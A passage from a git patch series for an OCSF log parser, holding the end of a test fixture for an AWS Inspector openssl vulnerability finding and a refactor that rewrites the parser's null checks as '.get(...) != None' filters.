\"arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\"}, \"severity\": \"Medium\", \"severity_id\": 3, \"status\": \"New\", \"time\": 1706307554000, \"time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"type_name\": \"Vulnerability Finding: Update\", \"type_uid\": 200202, \"unmapped\": {\"FindingProviderFields.Severity.Label\": \"MEDIUM\", \"FindingProviderFields.Types[]\": \"Software and Configuration Checks/Vulnerabilities/CVE\", \"ProductFields.aws/inspector/FindingStatus\": \"ACTIVE\", \"ProductFields.aws/inspector/inspectorScore\": \"5.9\", \"ProductFields.aws/inspector/packageVulnerabilityDetails/vulnerablePackages/sourceLayerHashes\": \"sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09\", \"ProductFields.aws/inspector/resources/1/resourceDetails/awsEcrContainerImageDetails/platform\": \"ALPINE_LINUX_3_17\", \"ProductFields.aws/securityhub/CompanyName\": \"Amazon\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/inspector/arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5\", \"ProductFields.aws/securityhub/ProductName\": \"Inspector\", \"RecordState\": \"ACTIVE\", \"Severity.Normalized\": \"40\", \"Vulnerabilities[].Cvss[].Source\": \"NVD,NVD\", \"Vulnerabilities[].Vendor.VendorSeverity\": \"MEDIUM\", \"Vulnerabilities[].VulnerablePackages[].SourceLayerHash\": \"sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09\", \"WorkflowState\": \"NEW\"}, \"vulnerabilities\": [{\"affected_packages\": [{\"architecture\": \"X86_64\", \"epoch\": 0, \"fixed_in_version\": \"0:3.0.8-r4\", \"name\": \"openssl\", \"package_manager\": \"OS\", \"release\": \"r3\", \"remediation\": {\"desc\": \"apk update && apk upgrade openssl\"}, \"version\": \"3.0.8\"}], \"cve\": {\"created_time_dt\": \"2023-04-20T13:15:06.000-04:00\", \"cvss\": [{\"base_score\": 5.9, \"vector_string\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}, {\"base_score\": 5.9, \"vector_string\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}], \"epss\": {\"score\": \"0.00066\"}, \"modified_time_dt\": \"2023-09-08T13:15:15.000-04:00\", \"references\": [\"https://nvd.nist.gov/vuln/detail/CVE-2023-1255\"], \"uid\": \"CVE-2023-1255\"}, \"is_exploit_available\": true, \"is_fix_available\": true, \"references\": [\"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bc2f61ad70971869b242fc1cb445b98bad50074a\", \"https://www.openssl.org/news/secadv/20230419.txt\", \"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=02ac9c9420275868472f33b01def01218742b8bb\"], \"remediation\": {\"desc\": \"Remediation is available. Please refer to the Fixed version in the vulnerability details section above.For detailed remediation guidance for each of the affected packages, refer to the vulnerabilities section of the detailed finding JSON.\"}, \"vendor_name\": \"NVD\"}]}",
     "event": {
       "action": "update",
-      "category": [],
+      "category": [
+        "vulnerability"
+      ],
       "severity": 3,
-      "type": []
+      "type": [
+        "info"
+      ]
     },
     "@timestamp": "2024-01-26T22:19:14Z",
     "cloud": {

From 09b16b028fac90250a33e0814edd807332e2f17a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 17:28:46 +0200
Subject: [PATCH 034/317] refactor(OCSF): change the way to test the nullable
 values

---
 OCSF/ocsf/ingest/parser.yml | 162 ++++++++++++++++++------------------
 1 file changed, 81 insertions(+), 81 deletions(-)

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 6a711a8ba..668a21e40 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -14,7 +14,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.end_time_dt }}"
         output_field: datetime
-    filter: "{{ parse_event.message.end_time_dt != null and parse_event.message.end_time_dt != '' }}"
+    filter: "{{ parse_event.message.get('end_time_dt') != None and parse_event.message.end_time_dt != '' }}"
 
   - name: parse_date_end_time
     external:
@@ -22,7 +22,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.end_time }}"
         output_field: datetime
-    filter: "{{ parse_event.message.end_time != null and parse_event.message.end_time != '' }}"
+    filter: "{{ parse_event.message.get('end_time') != None and parse_event.message.end_time != '' }}"
 
   - name: parse_date_timestamp_from_time_dt
     external:
@@ -30,7 +30,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.time_dt }}"
         output_field: datetime
-      filter: "{{ parse_event.message.time_dt != null and parse_event.message.time_dt != '' }}"
+      filter: "{{ parse_event.message.get('time_dt') != None and parse_event.message.time_dt != '' }}"
 
   - name: parse_date_timestamp_from_time
     external:
@@ -38,7 +38,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.time }}"
         output_field: datetime
-    filter: "{{ parse_event.message.time != null and parse_event.message.time != '' }}"
+    filter: "{{ parse_event.message.get('time') != None and parse_event.message.time != '' }}"
 
   - name: parse_date_time_dt
     external:
@@ -46,7 +46,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.time_dt }}"
         output_field: datetime
-    filter: "{{ parse_event.message.time_dt != null and parse_event.message.time_dt != '' }}"
+    filter: "{{ parse_event.message.get('time_dt') != None and parse_event.message.time_dt != '' }}"
 
   - name: parse_date_time
     external:
@@ -54,7 +54,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.time }}"
         output_field: datetime
-    filter: "{{ parse_event.message.time != null and parse_event.message.time != '' }}"
+    filter: "{{ parse_event.message.get('time') != None and parse_event.message.time != '' }}"
 
   - name: parse_date_start_time_dt
     external:
@@ -62,7 +62,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.start_time_dt }}"
         output_field: datetime
-    filter: "{{ parse_event.message.start_time_dt != null and parse_event.message.start_time_dt != '' }}"
+    filter: "{{ parse_event.message.get('start_time_dt') != None and parse_event.message.start_time_dt != '' }}"
 
   - name: parse_date_start_time
     external:
@@ -70,7 +70,7 @@ pipeline:
       properties:
         input_field: "{{ parse_event.message.start_time }}"
         output_field: datetime
-    filter: "{{ parse_event.message.start_time != null and parse_event.message.start_time != '' }}"
+    filter: "{{ parse_event.message.get('start_time') != None and parse_event.message.start_time != '' }}"
 
   - name: set_timestamp
   - name: set_event_kind
@@ -79,64 +79,64 @@ pipeline:
   - name: set_common_fields
 
   - name: pipeline_object_actor
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.actor != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}"
 
   - name: pipeline_object_attack
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.attacks != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}"
 
   - name: pipeline_object_network_connection_info
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.connection_info != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}"
 
   - name: pipeline_object_device
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.device != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}"
 
   - name: pipeline_object_http_request
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.http_request != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}"
 
   - name: pipeline_object_malware
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99904001,99904002,99904009,99904010] and parse_event.message.malware != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99904001,99904002,99904009,99904010] and parse_event.message.get('malware') != None }}"
 
   - name: pipeline_object_network_endpoint
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.dst_endpoint != null or parse_event.message.src_endpoint != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}"
 
   - name: pipeline_object_process
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.process != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}"
 
   - name: pipeline_object_proxy
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.proxy != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}"
 
   - name: pipeline_object_tls
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6001,6004,99904009,99904010] and parse_event.message.tls != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6001,6004,99904009,99904010] and parse_event.message.get('tls') != None }}"
 
   - name: pipeline_object_traffic
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,99904009,99904010] and parse_event.message.traffic != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,99904009,99904010] and parse_event.message.get('traffic') != None }}"
 
   - name: pipeline_object_user
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.user != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}"
 
   - name: pipeline_object_file
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.file != null }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}"
 
   - name: pipeline_object_system_activity_helper
-    filter: "{{ parse_event.message.class_uid != null and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}"
+    filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}"
 
   - name: pipeline_category_system_activity
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 1 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 1 }}"
 
   - name: pipeline_category_findings
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 2 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 2 }}"
 
   - name: pipeline_category_identity_and_access_management
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 3 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 3 }}"
 
   - name: pipeline_category_network_activity
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 4 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 4 }}"
 
   - name: pipeline_category_application_activity
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 6 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 6 }}"
 
   - name: pipeline_category_discovery
-    filter: "{{ parse_event.message.category_uid != null and parse_event.message.category_uid == 5 }}"
+    filter: "{{ parse_event.message.get('category_uid') != None and parse_event.message.category_uid == 5 }}"
 
 stages:
   set_timestamp:
@@ -164,8 +164,8 @@ stages:
       - set:
           event.category: >
             [
-              {%- if parse_event.message.class_uid == 2001 and parse_event.message.malware != null -%}'malware',{%- endif -%}
-              {%- if parse_event.message.class_uid == 2001 and parse_event.message.vulnerabilities != null -%}'vulnerability',{%- endif -%}
+              {%- if parse_event.message.class_uid == 2001 and parse_event.message.get('malware') != None -%}'malware',{%- endif -%}
+              {%- if parse_event.message.class_uid == 2001 and parse_event.message.get('vulnerabilities') != None -%}'vulnerability',{%- endif -%}
               {%- if parse_event.message.class_uid in [2002, 2003, 2004, 2005, 2006] -%}'vulnerability',{%- endif -%}
               {%- if parse_event.message.class_uid in [3001, 3005, 3006] -%}'iam',{%- endif -%}
               {%- if parse_event.message.class_uid == 3002 -%}'authentication',{%- endif -%}
@@ -237,19 +237,19 @@ stages:
 
       - set:
           event.end: "{{parse_date_end_time_dt.datetime}}"
-        filter: "{{parse_date_end_time_dt.datetime != null}}"
+        filter: "{{parse_date_end_time_dt.get('datetime') != None}}"
 
       - set:
           event.end: "{{parse_date_end_time.datetime}}"
-        filter: "{{parse_date_end_time.datetime != null}}"
+        filter: "{{parse_date_end_time.get('datetime') != None}}"
 
       - set:
           event.start: "{{parse_date_start_time_dt.datetime}}"
-        filter: "{{parse_date_start_time_dt.datetime != null}}"
+        filter: "{{parse_date_start_time_dt.get('datetime') != None}}"
 
       - set:
           event.start: "{{parse_date_start_time.datetime}}"
-        filter: "{{parse_date_start_time.datetime != null}}"
+        filter: "{{parse_date_start_time.get('datetime') != None}}"
 
       - translate:
         dictionary:
@@ -267,7 +267,7 @@ stages:
       - set:
           container.image.tag:
             - "{{ parse_event.message.actor.process.container.image.tag }}"
-        filter: "{{ parse_event.message.actor.process.container.image.tag != null }}"
+        filter: "{{ parse_event.message.actor.process.container.image.get('tag') != None }}"
       - set:
           orchestrator.type: "{{ parse_event.message.actor.process.container.orchestrator }}"
           #container.labels: "{{ parse_event.message.actor.process.container.image.labels }}" # @todo should be a dict?
@@ -309,11 +309,11 @@ stages:
       - set:
           process.group.id:
             - "{{ parse_event.message.actor.process.egid }}"
-        filter: "{{ parse_event.message.actor.process.egid != null }}"
+        filter: "{{ parse_event.message.actor.process.get('egid') != None }}"
       - set:
           process.group.id:
             - "{{ parse_event.message.actor.process.group.uid }}"
-        filter: "{{ parse_event.message.actor.process.group.uid != null }}"
+        filter: "{{ parse_event.message.actor.process.group.get('uid') != None }}"
       - set:
           process.group.name: "{{ parse_event.message.actor.process.group.name }}"
           process.name: "{{ parse_event.message.actor.process.name }}"
@@ -327,11 +327,11 @@ stages:
       - set:
           process.user.id:
             - "{{ parse_event.message.actor.process.euid }}"
-        filter: "{{ parse_event.message.actor.process.euid != null }}"
+        filter: "{{ parse_event.message.actor.process.get('euid') != None }}"
       - set:
           process.user.id:
             - "{{ parse_event.message.actor.process.user.uid }}"
-        filter: "{{ parse_event.message.actor.process.user.uid != null }}"
+        filter: "{{ parse_event.message.actor.process.user.get('uid') != None }}"
       - set:
           process.user.group.id: >
             [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
@@ -363,11 +363,11 @@ stages:
       - set:
           process.parent.group.id:
             - "{{ parse_event.message.actor.process.parent_process.egid }}"
-        filter: "{{ parse_event.message.actor.process.parent_process.egid != null }}"
+        filter: "{{ parse_event.message.actor.process.parent_process.get('egid') != None }}"
       - set:
           process.parent.group.id:
             - "{{ parse_event.message.actor.process.parent_process.group.uid }}"
-        filter: "{{ parse_event.message.actor.process.parent_process.group.uid != null }}"
+        filter: "{{ parse_event.message.actor.process.parent_process.group.get('uid') != None }}"
       - set:
           process.parent.group.name: "{{ parse_event.message.actor.process.parent_process.group.name }}"
           process.parent.name: "{{ parse_event.message.actor.process.parent_process.name }}"
@@ -381,11 +381,11 @@ stages:
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.actor.process.parent_process.euid }}"
-        filter: "{{ parse_event.message.actor.process.parent_process.euid != null }}"
+        filter: "{{ parse_event.message.actor.process.parent_process.get('euid') != None }}"
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.actor.process.parent_process.user.uid }}"
-        filter: "{{ parse_event.message.actor.process.parent_process.user.uid != null }}"
+        filter: "{{ parse_event.message.actor.process.parent_process.user.get('uid') != None }}"
       - set:
           process.parent.user.name: "{{ parse_event.message.actor.process.parent_process.user.name }}"
 
@@ -404,23 +404,23 @@ stages:
       - set:
           network.direction:
             - internal
-        filter: "{{ parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'Internal' }}"
+        filter: "{{ parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'Internal' }}"
       - set:
           network.direction:
             - external
-        filter: "{{ parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'External' }}"
+        filter: "{{ parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'External' }}"
       - set:
           network.direction:
             - inbound
-        filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Inbound' }}"
+        filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Inbound' }}"
       - set:
           network.direction:
             - outbound
-        filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Outbound' }}"
+        filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Outbound' }}"
       - set:
           network.direction:
             - unknown
-        filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Unknown' or parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'Unknown' }}"
+        filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Unknown' or parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'Unknown' }}"
 
   pipeline_object_device:
     actions:
@@ -441,12 +441,12 @@ stages:
         filter: "{{ parse_event.message.device.ip | is_ipaddress }}"
       - set:
           host.mac: ["{{ parse_event.message.device.mac }}"]
-        filter: "{{ parse_event.message.device.mac != null }}"
+        filter: "{{ parse_event.message.device.get('mac') != None }}"
       - set:
           host.os.name: "{{ parse_event.message.device.os.name }}"
       - set:
           host.os.type: "{{ parse_event.message.device.os.type }}"
-        filter: "{{ parse_event.message.device.os.type != null and parse_event.message.device.os.type in ['Linux','Windows','Android','macOS','iOS'] }}"
+        filter: "{{ parse_event.message.device.os.get('type') != None and parse_event.message.device.os.type in ['Linux','Windows','Android','macOS','iOS'] }}"
       - set:
           host.os.version: "{{ parse_event.message.device.os.build }}"
           host.risk.static_level: "{{ parse_event.message.device.risk_level }}"
@@ -505,7 +505,7 @@ stages:
     actions:
       - set:
           source.domain: "{{ parse_event.message.src_endpoint.domain }}"
-        filter: "{{ parse_event.message.src_endpoint.domain != null }}"
+        filter: "{{ parse_event.message.src_endpoint.get('domain') != None }}"
       - set:
           source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}"
           source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}"
@@ -516,7 +516,7 @@ stages:
           source.geo.region_iso_code: "{{ parse_event.message.src_endpoint.location.region }}"
       - set:
           source.domain: "{{ parse_event.message.src_endpoint.hostname }}"
-        filter: "{{ parse_event.message.src_endpoint.hostname != null }}"
+        filter: "{{ parse_event.message.src_endpoint.get('hostname') != None }}"
       - set:
           source.ip: "{{ parse_event.message.src_endpoint.ip }}"
         filter: "{{ parse_event.message.src_endpoint.ip | is_ipaddress }}"
@@ -525,10 +525,10 @@ stages:
           source.port: "{{ parse_event.message.src_endpoint.port }}"
       - set:
           network.application: "{{ parse_event.message.src_endpoint.svc_name }}"
-        filter: "{{ parse_event.message.src_endpoint.svc_name != null }}"
+        filter: "{{ parse_event.message.src_endpoint.get('svc_name') != None }}"
       - set:
           destination.domain: "{{ parse_event.message.dst_endpoint.domain }}"
-        filter: "{{ parse_event.message.dst_endpoint.domain != null }}"
+        filter: "{{ parse_event.message.dst_endpoint.get('domain') != None }}"
       - set:
           destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}"
           destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}"
@@ -540,14 +540,14 @@ stages:
           destination.geo.region_iso_code: "{{ parse_event.message.dst_endpoint.location.region }}"
       - set:
           destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}"
-        filter: "{{ parse_event.message.dst_endpoint.hostname != null }}"
+        filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}"
       - set:
           destination.ip: "{{ parse_event.message.dst_endpoint.ip }}"
           destination.mac: "{{ parse_event.message.dst_endpoint.mac }}"
           destination.port: "{{ parse_event.message.dst_endpoint.port }}"
       - set:
           network.application: "{{ parse_event.message.dst_endpoint.svc_name }}"
-        filter: "{{ parse_event.message.dst_endpoint.svc_name != null }}"
+        filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}"
 
   pipeline_object_process:
     actions:
@@ -557,7 +557,7 @@ stages:
       - set:
           container.image.tag:
             - "{{ parse_event.message.process.container.image.tag }}"
-        filter: "{{ parse_event.message.process.container.image.tag != null }}"
+        filter: "{{ parse_event.message.process.container.image.get('tag') != None }}"
       - set:
           container.labels: "{{ parse_event.message.process.container.image.labels }}"
           orchestrator.type: "{{ parse_event.message.process.container.orchestrator }}"
@@ -599,11 +599,11 @@ stages:
       - set:
           process.group.id:
             - "{{ parse_event.message.process.egid }}"
-        filter: "{{ parse_event.message.process.egid != null }}"
+        filter: "{{ parse_event.message.process.get('egid') != None }}"
       - set:
           process.group.id:
             - "{{ parse_event.message.process.group.uid }}"
-        filter: "{{ parse_event.message.process.group.uid != null }}"
+        filter: "{{ parse_event.message.process.group.get('uid') != None }}"
       - set:
           process.group.name: "{{ parse_event.message.process.group.name }}"
           process.name: "{{ parse_event.message.process.name }}"
@@ -617,11 +617,11 @@ stages:
       - set:
           process.user.id:
             - "{{ parse_event.message.process.euid }}"
-        filter: "{{ parse_event.message.process.euid != null }}"
+        filter: "{{ parse_event.message.process.get('euid') != None }}"
       - set:
           process.user.id:
             - "{{ parse_event.message.process.user.uid }}"
-        filter: "{{ parse_event.message.process.user.uid != null }}"
+        filter: "{{ parse_event.message.process.user.get('uid') != None }}"
       - set:
           process.user.group.id: >
             [{%- for item in parse_event.message.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
@@ -635,11 +635,11 @@ stages:
       - set:
           process.parent.group.id:
             - "{{ parse_event.message.process.parent_process.egid }}"
-        filter: "{{ parse_event.message.process.parent_process.egid != null }}"
+        filter: "{{ parse_event.message.process.parent_process.get('egid') != None }}"
       - set:
           process.parent.group.id:
             - "{{ parse_event.message.process.parent_process.group.uid }}"
-        filter: "{{ parse_event.message.process.parent_process.group.uid != null }}"
+        filter: "{{ parse_event.message.process.parent_process.group.get('uid') != None }}"
       - set:
           process.parent.group.name: "{{ parse_event.message.process.parent_process.group.name }}"
           process.parent.name: "{{ parse_event.message.process.parent_process.name }}"
@@ -653,11 +653,11 @@ stages:
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.process.parent_process.euid }}"
-        filter: "{{ parse_event.message.process.parent_process.euid != null }}"
+        filter: "{{ parse_event.message.process.parent_process.get('euid') != None }}"
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.process.parent_process.user.uid }}"
-        filter: "{{ parse_event.message.process.parent_process.user.uid != null }}"
+        filter: "{{ parse_event.message.process.parent_process.user.get('uid') != None }}"
       - set:
           process.parent.user.name: "{{ parse_event.message.process.parent_process.user.name }}"
       - set:
@@ -768,7 +768,7 @@ stages:
           file.x509.serial_number: "{{ parse_event.message.driver.file.signature.certificate.serial_number }}"
           file.x509.subject.distinguished_name: "{{ parse_event.message.driver.file.signature.certificate.subject }}"
           file.x509.version_number: "{{ parse_event.message.driver.file.signature.certificate.version }}"
-        filter: "{{ parse_event.message.driver.file != null }}"
+        filter: "{{ parse_event.message.driver.get('file') != None }}"
 
       - set:
           file.hash.md5: >
@@ -783,7 +783,7 @@ stages:
             {%- for item in parse_event.message.driver.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
           file.hash.tlsh: >
             {%- for item in parse_event.message.driver.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
-        filter: "{{ parse_event.message.driver.file != null }}"
+        filter: "{{ parse_event.message.driver.get('file') != None }}"
 
       - set:
           file.accessed: "{{ parse_event.message.job.file.accessed_time_dt or parse_event.message.job.file.accessed_time | to_rfc3339 }}"
@@ -803,7 +803,7 @@ stages:
           file.x509.serial_number: "{{ parse_event.message.job.file.signature.certificate.serial_number }}"
           file.x509.subject.distinguished_name: "{{ parse_event.message.job.file.signature.certificate.subject }}"
           file.x509.version_number: "{{ parse_event.message.job.file.signature.certificate.version }}"
-        filter: "{{ parse_event.message.job.file != null }}"
+        filter: "{{ parse_event.message.job.get('file') != None }}"
 
       - set:
           file.hash.md5: >
@@ -818,7 +818,7 @@ stages:
             {%- for item in parse_event.message.job.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
           file.hash.tlsh: >
